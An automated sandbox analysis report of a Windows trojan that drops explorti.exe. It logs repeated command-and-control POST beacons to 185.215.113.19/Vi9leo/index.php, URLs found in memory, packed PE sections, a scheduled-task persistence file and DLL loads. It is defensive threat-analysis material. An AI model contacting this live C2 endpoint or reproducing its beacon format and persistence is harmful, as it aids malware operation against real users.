Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 2_2_00E2BD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000002.00000002.3856846494.0000000001372000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1z&V
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php9
Source: explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php:
Source: explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpM
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpW
Source: explorti.exe, 00000002.00000002.3856846494.000000000133E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpheCounterMutex8
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpl
Source: explorti.exe, 00000002.00000002.3856846494.000000000133E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpv

System Summary
barindex
PE file contains section with special chars
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E24CF0 2_2_00E24CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E63068 2_2_00E63068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E2E440 2_2_00E2E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E57D83 2_2_00E57D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E24AF0 2_2_00E24AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E6765B 2_2_00E6765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E62BD0 2_2_00E62BD0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E6777B 2_2_00E6777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E68720 2_2_00E68720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 2_2_00E66F09 2_2_00E66F09
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: Section: ZLIB complexity 0.99981856215847
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Static PE information: Section: eqezoorp ZLIB complexity 0.994464981179189
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.99981856215847
Source: explorti.exe.0.dr Static PE information: Section: eqezoorp ZLIB complexity 0.994464981179189
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe Section loaded: winsta.dll Jump to behavior
